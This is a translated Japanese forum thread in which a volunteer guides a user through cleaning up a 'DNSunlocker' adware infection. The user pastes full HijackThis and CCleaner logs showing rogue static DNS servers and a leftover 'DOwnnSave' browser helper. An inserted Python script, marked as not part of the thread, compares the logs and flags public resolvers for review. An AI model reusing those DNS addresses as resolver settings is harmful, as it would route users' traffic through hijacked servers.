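Pressing "Save to text file" at the bottom right there lets you save the displayed contents as a log, so save the log somewhere such as the desktop.

Next, open each of the tabs from the "Internet Explorer" tab onward in turn and save those logs as well.

Once you have taken each of the CC logs, close CC.

After this, start your browser, watch the PC's condition for a few hours, and then take a fresh HJT log and a fresh CC installed-programs log.

Paste both re-taken logs and each of the CC logs into your reply, together with a status report.
I will give instructions for the next steps after looking at them.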
  • 悪代官
  • 2015/09/07 (Mon) 06:18:41
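Added example (not part of any post in this thread): one way to compare the first HijackThis log with the re-taken one that the instructions above ask for, and to list O17 `NameServer` values that lie outside private address space. The log lines are copied and abridged from the two logs posted in this thread; the function names `parse_entries`, `compare_logs` and `static_public_dns` are this example's own.

```python
import ipaddress
import re

# Abridged from the first log in this thread (2015/09/06).
LOG_BEFORE = r"""Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 16:20:19, on 2015/09/06
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: DOwnnSave - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.dll (file missing)
O4 - HKLM\..\Run: [LogMeIn Hamachi Ui] "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
"""

# Abridged from the re-taken log posted later in this thread (2015/09/08).
LOG_AFTER = r"""Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 0:46:38, on 2015/09/08
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
"""

# A result line starts with a section code (F2, O2, O17, ...) followed by " - ".
ENTRY = re.compile(r"^([A-Z]\d{1,2}) - (.+)$")
# O17 body: ...\{interface GUID}: NameServer = ip[,ip...]
O17_NAMESERVER = re.compile(r"\{([0-9A-Fa-f-]{36})\}: NameServer = (.+)$")


def parse_entries(log_text):
    """Return (section_code, body) tuples; header and process lines are skipped."""
    entries = []
    for line in log_text.splitlines():
        match = ENTRY.match(line.strip())
        if match:
            entries.append((match.group(1), match.group(2)))
    return entries


def compare_logs(before, after):
    """Classify entries as removed, added or kept between two scans."""
    old, new = set(parse_entries(before)), set(parse_entries(after))
    return {
        "removed": sorted(old - new),
        "added": sorted(new - old),
        "kept": sorted(old & new),
    }


def static_public_dns(log_text):
    """Map interface GUID -> statically set resolvers that are not private addresses."""
    found = {}
    for code, body in parse_entries(log_text):
        if code != "O17":
            continue
        match = O17_NAMESERVER.search(body)
        if not match:
            continue
        guid = match.group(1).upper()
        # The registry value may be comma- or space-separated.
        for value in re.split(r"[,\s]+", match.group(2).strip()):
            try:
                address = ipaddress.ip_address(value)
            except ValueError:
                continue  # not an IP literal; ignore
            if not address.is_private:
                found.setdefault(guid, set()).add(str(address))
    return {guid: sorted(ips) for guid, ips in found.items()}


if __name__ == "__main__":
    result = compare_logs(LOG_BEFORE, LOG_AFTER)
    for label in ("removed", "added"):
        for code, body in result[label]:
            print(f"{label:8} {code} - {body}")
    for guid, ips in static_public_dns(LOG_AFTER).items():
        print(f"review   O17 {{{guid}}} NameServer = {', '.join(ips)}")
```

A resolver outside private address space is only a prompt to compare the value with what the router or ISP is expected to hand out; the script draws no conclusion about any address.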
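Re: DNSunlocker infection
This may not be the right place to ask, but when I try to run Windows Update,
"Error code: 8024002E" appears with a message that it could not search for new updates, and I cannot update. Is this also the effect of a virus or something similar?

I looked up the error code but could not find a clear solution, and I am stuck.

As a supplement: I had set Windows Update to manual because I found the notifications annoying, and at some point it ended up like this.


※ Addendum 1: I left something out. I had tinkered with the registry a little, and after I restarted, the work progressed a little. I will continue with the work.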
  • あすとろ
  • 2015/09/07 (Mon) 15:12:41
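Please keep a recovery in view as well
Sorry for the late reply.
Because the number of people seeking help today is much higher than usual, I will proceed with somewhat simplified explanations and instructions for each thread.
This is so that I can reply to as many people as possible, so please bear with me.

>when I try to run Windows Update,
>"Error code: 8024002E" appears with a message that it could not search for new updates, and I cannot update. Is this also the effect of a virus or something similar?

Even on ordinary consideration, WU not working properly is a rather dangerous state.
Even if there is no infection and it is simply a system error on the PC, the inside of the PC must be quite unstable, so if it goes on much longer, doing a recovery is the safe and reliable option.
Please back up the data you need soon.

Now, could you show me in a reply each of the logs taken after proceeding according to the earlier instructions?
Let's start investigating from wherever we can.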
  • 悪代官
  • 2015/09/07 (Mon) 20:44:00
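Re: DNSunlocker infection
I am the one who should apologize for the late reply.

>Because the number of people seeking help today is much higher than usual, I will proceed with somewhat simplified explanations and instructions for each thread.
>This is so that I can reply to as many people as possible, so please bear with me.

Thank you for helping me even though you are so busy.


Getting to the main point: I decided to put Windows Update aside for now (the updates and uninstallations of the other specified software are complete) and carry on with the work.

As a status report: I tried using the browser just a little, and the symptoms have still not subsided.

I will paste the logs below.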


HJT------------------------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 0:46:38, on 2015/09/08
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 37.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 11938 bytes


cc chrome----------------

有効 App Gmail 8.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 6.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0
有効 App YouTube 4.2.7 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension Adblock Plus 1.9 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9_0
有効 Extension Chrome リモート デスクトップ 42.0.2311.37 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp\42.0.2311.37_0
有効 Extension FireShot - ウェブページのスクリーンショットをキャプチャ 0.98.68 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.68_0
有効 Extension Gestures for Google Chrome™ 1.13.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0
有効 Extension HGPlugin 1.1.0.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\omgpfjbejkpcnpadohokpjllldkejfpp\1.1.0.1_0
有効 Extension グランブルーファンタジー[ChromeApps版] 1.2.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.1_0
有効 Plugin Adobe Acrobat 10.1.13.16 最初のユーザー C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
有効 Plugin AhnLab Online Security 2, 0, 0, 85 最初のユーザー C:\Program Files (x86)\AhnLab\ASP\Components\aosmgr\conflict_507\npaosmgr.dll
有効 Plugin AhnLab Online Security Anti-keylogger 2, 5, 0, 73 最初のユーザー C:\Program Files (x86)\AhnLab\ASP\MyKeyDefense 2.5\npmkd25sp.dll
有効 Plugin Battlelog Game Launcher 2.4.0 最初のユーザー C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
有効 Plugin Battlelog Game Launcher 2.6.2 最初のユーザー C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll
有効 Plugin Chrome PDF Viewer 最初のユーザー C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\pdf.dll
有効 Plugin Chrome Remote Desktop Viewer 最初のユーザー internal-remoting-viewer
有効 Plugin Google Update 1.3.26.9 最初のユーザー C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 最初のユーザー C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin iTunes Application Detector 1.0.1.1 最初のユーザー C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin Java Deployment Toolkit 8.0.310.13 11.31.2.13 最初のユーザー C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll
有効 Plugin Java(TM) Platform SE 8 U31 11.31.2.13 最初のユーザー C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll
有効 Plugin Native Client 最初のユーザー C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\internal-nacl-plugin
無効 Plugin Nexon Game Controller 1, 0, 1, 4 最初のユーザー C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
無効 Plugin Pando Web Plugin 2.3.3.8 最初のユーザー C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll
有効 Plugin Shockwave Flash 16,0,0,305 最初のユーザー C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll
有効 Plugin Shockwave Flash 16.0.0.305 最初のユーザー C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\PepperFlash\pepflashplayer.dll
有効 Plugin Silverlight Plug-In 5.1.30514.0 最初のユーザー c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll
無効 Plugin Unity Player 4.3.7.98772 最初のユーザー C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
有効 Plugin Widevine Content Decryption Module 1.4.6.758 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.6.758\_platform_specific\win_x86\widevinecdmadapter.dll
有効 Plugin Windows Live™ Photo Gallery 15.4.3538.0513_ship.wlx.w4m4 (ship) 最初のユーザー C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


cc firefox---------------------------

有効 Plugin Adobe Acrobat 10.1.15.11 Adobe Systems Inc. default Firefox 37.0.1 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
有効 Plugin Battlelog Game Launcher 2.4.0.0 EA Digital Illusions CE AB default Firefox 37.0.1 C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
有効 Plugin Battlelog Game Launcher 2.6.2.0 EA Digital Illusions CE AB default Firefox 37.0.1 C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll
有効 Plugin Google Update 1.3.28.13 Google Inc. default Firefox 37.0.1 C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 37.0.1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 37.0.1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
有効 Plugin iTunes Application Detector 1.0.1.1 Apple Inc. default Firefox 37.0.1 C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin Java Deployment Toolkit 8.0.600.27 11.60.2.27 Oracle Corporation default Firefox 37.0.1 C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 8 U60 11.60.2.27 Oracle Corporation default Firefox 37.0.1 C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll
有効 Plugin Nexon Game Controller 1.0.1.4 Nexon default Firefox 37.0.1 C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin OpenH264 Video Codec 1.3 default Firefox 37.0.1 C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\gmp-gmpopenh264\1.3\gmpopenh264.dll
有効 Plugin Shockwave Flash 18.0.0.232 Adobe Systems Incorporated default Firefox 37.0.1 C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
有効 Plugin Silverlight Plug-In 5.1.40416.0 Microsoft Corporation default Firefox 37.0.1 c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll
有効 Plugin Unity Player 4.3.7.33236 Unity Technologies ApS default Firefox 37.0.1 C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3538.513 Microsoft Corporation default Firefox 37.0.1 C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


cc IE---------------------------
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Helper DOwnnSave C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll
有効 Helper Java(tm) Plug-In 2 SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
有効 Helper Java(tm) Plug-In SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll


cc windows---------------------------

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run Dropbox Update Dropbox, Inc. "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
無効 HKLM:Run Adobe ARM Adobe Systems Incorporated "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
有効 HKLM:Run BackupManagerTray NTI Corporation "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
有効 HKLM:Run ETDCtrl ELAN Microelectronics Corp. %ProgramFiles%\Elantech\ETDCtrl.exe
有効 HKLM:Run Google Japanese Input Prelauncher Google Inc. "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run IntelTBRunOnce Microsoft Corporation wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
有効 HKLM:Run iTunesHelper Apple Inc. "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
有効 HKLM:Run Launch LCore Logitech Inc. C:\Program Files\Logicool Gaming Software\LCore.exe /minimized
有効 HKLM:Run LManager Dritek System Inc. C:\Program Files (x86)\Launch Manager\LManager.exe
有効 HKLM:Run Logitech Download Assistant Microsoft Corporation C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
無効 HKLM:Run LogMeIn Hamachi Ui LogMeIn Inc. "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
無効 HKLM:Run mcui_exe "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
有効 HKLM:Run MSC Microsoft Corporation "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
無効 HKLM:Run Norton Online Backup Symantec Corporation C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
無効 HKLM:Run RTHDVCPL Realtek Semiconductor C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
